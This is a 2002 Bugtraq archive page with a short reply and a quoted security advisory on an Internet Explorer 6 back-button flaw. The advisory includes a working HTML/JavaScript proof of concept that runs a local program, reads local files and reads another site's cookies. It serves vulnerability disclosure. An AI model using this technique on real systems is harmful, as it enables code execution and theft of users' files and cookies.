This works even if I add both the res: and javascript: URL types to the "Restricted Sites" zone with everything disabled. (Added via HKLM\Software\Microsoft\Windows\Current Version\Internet Settings\ZoneMap\ProtocolDefaults) -----Original Message----- From: Andreas Sandblad [mailto:sandbladat_private] Sent: Sunday, April 14, 2002 4:06 PM To: bugtraqat_private Subject: Using the backbutton in IE is dangerous ---..---..---..---..---..---..---..---..---..---..---..---..---- Title: Using the backbutton in IE is dangerous. Date: [2002-04-15] Software: At least Internet Explorer 6.0. Tested env: Windows 2000 pro, XP. Rating: Medium because user interaction is needed. Impact: Read cookies/local files and execute code (triggered when user hits the back button). Patch: None. Vendor: Microsoft contacted 12 Nov 2001, additional information given 25 Mar 2002. Workaround: Disable active scripting or never _ _ use the back button. o' \,=./ `o Author: Andreas Sandblad, sandbladat_private (o o) ---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo--- DESCRIPTION: ============ IE allows urls containing the javascript protocoll in the history list. Code injected in the url will operate in the same zone/domain as the last url viewed. The javascript url can be set to trigger when a user presses the backbutton. The normal behaviour when a page fails to load is to press the backbutton. The error page shown by IE is operating in the local computer zone (res://C:\WINNT\System32\shdoclc.dll/dnserror.htm# on Win2000). Thus, we can execute code and read local files. EXPLOIT: ======== The exploit works as follow: Press one of the links and then the back button. Note: Exploit has only been tested on fully patched IE 6.0, with Win XP and Win2000 pro (assume other OS are also vulnerable). Winmine.exe and test.txt must exist. --------------------------CUT HERE------------------------------- <html> <h1>Press link and then the backbutton to trigger script.</h1> <a href="javascript:execFile('file:///c:/winnt/system32/winmine.exe')"> Run Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)</a><br> <a href="javascript:execFile('file:///c:/windows/system32/winmine.exe')"> Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)</a><br> <a href="javascript:readFile('file:///c:/test.txt')"> Read c:\test.txt (needs to be created)</a><br> <a href="javascript:readCookie('http://www.google.com/')"> Read Google cookie</a> <script> // badUrl = "http://www.nonexistingdomain.se"; // Use if not XP badUrl = "res:"; function execFile(file){ s = '<object classid=CLSID:11111111-1111-1111-1111-111111111111 '; s+= 'CODEBASE='+file+'></OBJECT>'; backBug(badUrl,s); } function readFile(file){ s = '<iframe name=i src='+file+' style=display:none onload='; s+= 'alert(i.document.body.innerText)></iframe>'; backBug(badUrl,s); } function readCookie(url){ s = '<script>alert(document.cookie);close();<"+"/script>'; backBug(url,s); } function backBug(url,payload){ len = history.length; page = document.location; s = "javascript:if (history.length!="+len+") {"; s+= "open('javascript:document.write(\""+payload+"\")')"; s+= ";history.back();} else '<script>location=\""+url s+= "\";document.title=\""+page+"\";<"+"/script>';"; location = s; } </script> </html> --------------------------CUT HERE------------------------------- Disclaimer: =========== Andreas Sandblad is not responsible for the misuse of the information provided in this advisory. The opinions expressed are my own and not of any company. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this advisory. Any use of the information is at the user's own risk. Feedback: ========= Please send suggestions and comments to: _ _ sandbladat_private o' \,=./ `o (o o) ---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo--- Andreas Sandblad, student in Engineering Physics at the University of Umea, Sweden. -/---/---/---/---/---/---/---/---/---/---/---/---/---/---/---/--
This archive was generated by hypermail 2b30 : Tue Apr 16 2002 - 23:18:30 PDT